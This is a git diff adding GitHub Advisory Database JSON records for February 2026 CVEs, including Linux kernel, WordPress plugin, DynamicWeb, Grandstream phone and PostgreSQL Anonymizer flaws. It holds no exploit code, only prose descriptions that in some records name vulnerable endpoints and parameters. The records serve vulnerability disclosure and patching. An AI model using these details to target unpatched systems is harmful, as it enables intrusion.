"2026-02-14T17:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r36r-8jrx-92cq/GHSA-r36r-8jrx-92cq.json b/advisories/unreviewed/2026/02/GHSA-r36r-8jrx-92cq/GHSA-r36r-8jrx-92cq.json new file mode 100644 index 0000000000000..9950641c27561 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r36r-8jrx-92cq/GHSA-r36r-8jrx-92cq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r36r-8jrx-92cq", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2025-61969" + ], + "details": "Incorrect permission assignment in AMD µProf may allow a local user-privileged attacker to achieve privilege escalation, potentially resulting in arbitrary code execution.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61969" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-9022.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r3f7-9rj4-j5fm/GHSA-r3f7-9rj4-j5fm.json b/advisories/unreviewed/2026/02/GHSA-r3f7-9rj4-j5fm/GHSA-r3f7-9rj4-j5fm.json new file mode 100644 index 0000000000000..925d1ddd04030 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r3f7-9rj4-j5fm/GHSA-r3f7-9rj4-j5fm.json @@ -0,0 +1,49 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r3f7-9rj4-j5fm", + "modified": "2026-02-19T18:31:43Z", + "published": "2026-02-14T18:30:15Z", + "aliases": [ + "CVE-2026-23169" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race in mptcp_pm_nl_flush_addrs_doit()\n\nsyzbot and Eulgyu Kim reported crashes in mptcp_pm_nl_get_local_id()\nand/or mptcp_pm_nl_is_backup()\n\nRoot cause is list_splice_init() in mptcp_pm_nl_flush_addrs_doit()\nwhich is not RCU ready.\n\nlist_splice_init_rcu() can not be called here while holding pernet->lock\nspinlock.\n\nMany thanks to Eulgyu Kim for providing a repro and testing our patches.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23169" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1f1b9523527df02685dde603f20ff6e603d8e4a1" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/338d40bab283da2639780ee3e458fb61f1567d8c" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/455e882192c9833f176f3fbbbb2f036b6c5bf555" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/51223bdd0f60b06cfc7f25885c4d4be917adba94" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7896dbe990d56d5bb8097863b2645355633665eb" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e2a9eeb69f7d4ca4cf4c70463af77664fdb6ab1d" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T16:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r3p8-h9vv-9cqc/GHSA-r3p8-h9vv-9cqc.json b/advisories/unreviewed/2026/02/GHSA-r3p8-h9vv-9cqc/GHSA-r3p8-h9vv-9cqc.json new file mode 100644 index 0000000000000..39e3c1279ffd9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r3p8-h9vv-9cqc/GHSA-r3p8-h9vv-9cqc.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r3p8-h9vv-9cqc", + "modified": "2026-02-14T00:32:42Z", + "published": "2026-02-13T18:31:24Z", + "aliases": [ + "CVE-2025-70093" + ], + "details": "An issue in OpenSourcePOS v3.4.1 allows attackers to execute arbitrary code via returning a crafted AJAX response.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70093" + }, + { + "type": "WEB", + "url": "https://github.com/opensourcepos/opensourcepos/pull/4357" + }, + { + "type": "WEB", + "url": "https://github.com/hungnqdz/cve-research/blob/main/CVE-2025-70093.md" + }, + { + "type": "WEB", + "url": "https://www.opensourcepos.org" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T16:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r435-hw3q-c6g9/GHSA-r435-hw3q-c6g9.json b/advisories/unreviewed/2026/02/GHSA-r435-hw3q-c6g9/GHSA-r435-hw3q-c6g9.json new file mode 100644 index 0000000000000..e2b8729212985 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r435-hw3q-c6g9/GHSA-r435-hw3q-c6g9.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r435-hw3q-c6g9", + "modified": "2026-02-19T18:31:51Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-2731" + ], + "details": "Path traversal and content injection in JobRunnerBackground.aspx in DynamicWeb 8 (all) and 9 (<9.19.7 and <9.20.3) allows unauthenticated attackers to execute code via simple web requests", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2731" + }, + { + "type": "WEB", + "url": "https://doc.dynamicweb.dev/documentation/fundamentals/dw10release/security-reports.html#january-19th-2026---unauthenticated-rce-dynamicweb-9-and-dynamicweb-8" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r46r-328f-mg57/GHSA-r46r-328f-mg57.json b/advisories/unreviewed/2026/02/GHSA-r46r-328f-mg57/GHSA-r46r-328f-mg57.json new file mode 100644 index 0000000000000..cbdbb177ad134 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r46r-328f-mg57/GHSA-r46r-328f-mg57.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r46r-328f-mg57", + "modified": "2026-02-13T21:31:39Z", + "published": "2026-02-13T21:31:39Z", + "aliases": [ + "CVE-2025-58182" + ], + "details": "Rejected reason: reserved but not needed", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58182" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T21:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r47q-hvhr-7cx6/GHSA-r47q-hvhr-7cx6.json b/advisories/unreviewed/2026/02/GHSA-r47q-hvhr-7cx6/GHSA-r47q-hvhr-7cx6.json new file mode 100644 index 0000000000000..d9b9bf7e0a916 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r47q-hvhr-7cx6/GHSA-r47q-hvhr-7cx6.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r47q-hvhr-7cx6", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2026-1215" + ], + "details": "The MMA Call Tracking plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.3.15. This is due to missing nonce validation when saving plugin configuration on the `mma_call_tracking_menu` admin page. This makes it possible for unauthenticated attackers to modify call tracking configuration settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1215" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/mma-call-tracking/tags/2.3.15/mma_call_tracking.php#L61" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/mma-call-tracking/tags/2.3.15/mma_call_tracking.php#L967" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/mma-call-tracking/trunk/mma_call_tracking.php#L61" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/mma-call-tracking/trunk/mma_call_tracking.php#L967" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5689bd2b-1518-4b3b-81a3-cc92575f6c1f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json b/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json new file mode 100644 index 0000000000000..0c7963d6b7ddd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r4m3-cm43-fxrj", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-2329" + ], + "details": "An unauthenticated stack-based buffer overflow vulnerability exists in the HTTP API endpoint /cgi-bin/api.values.get. A remote attacker can leverage this vulnerability to achieve unauthenticated remote code execution (RCE) with root privileges on a target device. The vulnerability affects all six device models in the series: GXP1610, GXP1615, GXP1620, GXP1625, GXP1628, and GXP1630.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2329" + }, + { + "type": "WEB", + "url": "https://github.com/rapid7/metasploit-framework/pull/20983" + }, + { + "type": "WEB", + "url": "https://firmware.grandstream.com/Release_Note_GXP16xx_1.0.7.81.pdf" + }, + { + "type": "WEB", + "url": "https://psirt.grandstream.com" + }, + { + "type": "WEB", + "url": "https://www.rapid7.com/blog/post/ve-cve-2026-2329-critical-unauthenticated-stack-buffer-overflow-in-grandstream-gxp1600-voip-phones-fixed" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r4m5-gc42-8vvh/GHSA-r4m5-gc42-8vvh.json b/advisories/unreviewed/2026/02/GHSA-r4m5-gc42-8vvh/GHSA-r4m5-gc42-8vvh.json new file mode 100644 index 0000000000000..c293e49d3b5a5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r4m5-gc42-8vvh/GHSA-r4m5-gc42-8vvh.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r4m5-gc42-8vvh", + "modified": "2026-02-20T00:31:53Z", + "published": "2026-02-20T00:31:53Z", + "aliases": [ + "CVE-2025-8055" + ], + "details": "Server-Side Request Forgery (SSRF) vulnerability in OpenText™ XM Fax allows Server Side Request Forgery. \n\nThe vulnerability could allow an attacker to\n\n\n\nperform blind SSRF to other systems accessible from the XM Fax server.\n\nThis issue affects XM Fax: 24.2.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:A/V:D/RE:M/U:Amber" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8055" + }, + { + "type": "WEB", + "url": "https://support.opentext.com/csm?id=ot_kb_unauthenticated&sysparm_article=KB0847038" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T23:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r5cf-37x9-4hgv/GHSA-r5cf-37x9-4hgv.json b/advisories/unreviewed/2026/02/GHSA-r5cf-37x9-4hgv/GHSA-r5cf-37x9-4hgv.json new file mode 100644 index 0000000000000..1d4011263dfdb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r5cf-37x9-4hgv/GHSA-r5cf-37x9-4hgv.json @@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r5cf-37x9-4hgv", + "modified": "2026-02-13T15:30:24Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20658" + ], + "details": "A package validation issue was addressed by blocking the vulnerable package. This issue is fixed in macOS Tahoe 26.3. An app may be able to gain root privileges.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20658" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r5hv-pjcp-ccv3/GHSA-r5hv-pjcp-ccv3.json b/advisories/unreviewed/2026/02/GHSA-r5hv-pjcp-ccv3/GHSA-r5hv-pjcp-ccv3.json new file mode 100644 index 0000000000000..97a6560697ced --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r5hv-pjcp-ccv3/GHSA-r5hv-pjcp-ccv3.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r5hv-pjcp-ccv3", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:50Z", + "aliases": [ + "CVE-2025-14445" + ], + "details": "The Image Hotspot by DevVN plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'hotspot_content' custom field meta in all versions up to, and including, 1.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14445" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/devvn-image-hotspot/tags/1.2.9/admin/inc/add_shortcode_devvn_ihotspot.php?marks=97#L97" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3417725%40devvn-image-hotspot&new=3417725%40devvn-image-hotspot&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e41965eb-f8eb-4f40-b8f6-e415dff048cd?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r63r-4348-x8g9/GHSA-r63r-4348-x8g9.json b/advisories/unreviewed/2026/02/GHSA-r63r-4348-x8g9/GHSA-r63r-4348-x8g9.json new file mode 100644 index 0000000000000..728de65360a8f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r63r-4348-x8g9/GHSA-r63r-4348-x8g9.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r63r-4348-x8g9", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25324" + ], + "details": "RICOH Web Image Monitor 1.09 contains an HTML injection vulnerability in the address configuration CGI script that allows attackers to inject malicious HTML code. Attackers can exploit the entryNameIn and entryDisplayNameIn parameters to insert arbitrary HTML content, potentially enabling cross-site scripting attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25324" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47827" + }, + { + "type": "WEB", + "url": "https://www.ricoh.com" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/ricoh-web-image-monitor-html-injection" + }, + { + "type": "WEB", + "url": "http://support-download.com/services/device/webhlp/nb/gen/v140cc1/en/p_top010.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r647-2xmg-2cg7/GHSA-r647-2xmg-2cg7.json b/advisories/unreviewed/2026/02/GHSA-r647-2xmg-2cg7/GHSA-r647-2xmg-2cg7.json index 5672b094d178c..722442f255fe2 100644 --- a/advisories/unreviewed/2026/02/GHSA-r647-2xmg-2cg7/GHSA-r647-2xmg-2cg7.json +++ b/advisories/unreviewed/2026/02/GHSA-r647-2xmg-2cg7/GHSA-r647-2xmg-2cg7.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-r6ff-p4vx-28hv/GHSA-r6ff-p4vx-28hv.json b/advisories/unreviewed/2026/02/GHSA-r6ff-p4vx-28hv/GHSA-r6ff-p4vx-28hv.json new file mode 100644 index 0000000000000..a654967e8748e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r6ff-p4vx-28hv/GHSA-r6ff-p4vx-28hv.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r6ff-p4vx-28hv", + "modified": "2026-02-11T18:31:29Z", + "published": "2026-02-11T18:31:29Z", + "aliases": [ + "CVE-2026-24789" + ], + "details": "An unprotected API endpoint allows an attacker to remotely change the device password without providing authentication.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24789" + }, + { + "type": "WEB", + "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-041-02.json" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-041-02" + }, + { + "type": "WEB", + "url": "https://www.zlmcu.com/en/contact_us.htm" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T17:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r6pf-fx8p-436v/GHSA-r6pf-fx8p-436v.json b/advisories/unreviewed/2026/02/GHSA-r6pf-fx8p-436v/GHSA-r6pf-fx8p-436v.json new file mode 100644 index 0000000000000..952a91f12b82e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r6pf-fx8p-436v/GHSA-r6pf-fx8p-436v.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r6pf-fx8p-436v", + "modified": "2026-02-14T18:30:15Z", + "published": "2026-02-14T18:30:15Z", + "aliases": [ + "CVE-2026-23156" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nefivarfs: fix error propagation in efivar_entry_get()\n\nefivar_entry_get() always returns success even if the underlying\n__efivar_entry_get() fails, masking errors.\n\nThis may result in uninitialized heap memory being copied to userspace\nin the efivarfs_file_read() path.\n\nFix it by returning the error from __efivar_entry_get().", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23156" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3960f1754664661a970dc9ebbab44ff93a0b4c42" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4b22ec1685ce1fc0d862dcda3225d852fb107995" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/510a16f1c5c1690b33504052bc13fbc2772c23f8" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/89b8ca709eeeabcc11ebba64806677873a2787a8" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e4e15a0a4403c96d9898d8398f0640421df9cb16" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T16:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r6q3-r9p8-6prh/GHSA-r6q3-r9p8-6prh.json b/advisories/unreviewed/2026/02/GHSA-r6q3-r9p8-6prh/GHSA-r6q3-r9p8-6prh.json new file mode 100644 index 0000000000000..ab80021946d3b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r6q3-r9p8-6prh/GHSA-r6q3-r9p8-6prh.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r6q3-r9p8-6prh", + "modified": "2026-02-15T06:31:35Z", + "published": "2026-02-15T06:31:35Z", + "aliases": [ + "CVE-2026-1490" + ], + "details": "The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an authorization bypass via reverse DNS (PTR record) spoofing on the 'checkWithoutToken' function in all versions up to, and including, 6.71. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. Note: This is only exploitable on sites with an invalid API key.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1490" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/cleantalk-spam-protect/trunk/lib/Cleantalk/ApbctWP/RemoteCalls.php#L69" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/cleantalk-spam-protect/trunk/lib/Cleantalk/Common/Helper.php#L64" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3454488/cleantalk-spam-protect#file473" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cb603be6-4a12-49e1-b8cc-b2062eb97f16?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-350" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-15T04:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r6q3-ww97-px52/GHSA-r6q3-ww97-px52.json b/advisories/unreviewed/2026/02/GHSA-r6q3-ww97-px52/GHSA-r6q3-ww97-px52.json new file mode 100644 index 0000000000000..7efe5bb737bfa --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r6q3-ww97-px52/GHSA-r6q3-ww97-px52.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r6q3-ww97-px52", + "modified": "2026-02-11T18:31:31Z", + "published": "2026-02-11T18:31:31Z", + "aliases": [ + "CVE-2026-2360" + ], + "details": "PostgreSQL Anonymizer contains a vulnerability that allows a user to gain superuser privileges by creating a custom operator in the public schema and place malicious code in that operator. This operator will later be executed with superuser privileges when the extension is created. The risk is higher with PostgreSQL 14 or with instances upgraded from PostgreSQL 14 or a prior version. With PostgreSQL 15 and later, the creation permission on the public schema is revoked by default and this exploit can only be achieved if a superuser adds a new schema in her/his own search_path and grants the CREATE privilege on that schema to untrusted users, both actions being clearly discouraged by the PostgreSQL documentation. The problem is resolved in PostgreSQL Anonymizer 3.0.1 and further versions", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2360" + }, + { + "type": "WEB", + "url": "https://gitlab.com/dalibo/postgresql_anonymizer/-/blob/latest/NEWS.md" + }, + { + "type": "WEB", + "url": "https://gitlab.com/dalibo/postgresql_anonymizer/-/issues/616" + }, + { + "type": "WEB", + "url": "https://www.postgresql.org/docs/current/ddl-schemas.html#DDL-SCHEMAS-PATH" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T18:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r77x-pqm4-6252/GHSA-r77x-pqm4-6252.json b/advisories/unreviewed/2026/02/GHSA-r77x-pqm4-6252/GHSA-r77x-pqm4-6252.json new file mode 100644 index 0000000000000..bd2e0e158666f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r77x-pqm4-6252/GHSA-r77x-pqm4-6252.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r77x-pqm4-6252", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-60037" + ], + "details": "A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, specifically opening a specially crafted file, which then causes the application to deserialize the malicious data, enabling Remote Code Execution (RCE). This can lead to a complete compromise of the system running Rexroth IndraWorks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60037" + }, + { + "type": "WEB", + "url": "https://psirt.bosch.com/security-advisories/BOSCH-SA-591522.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git 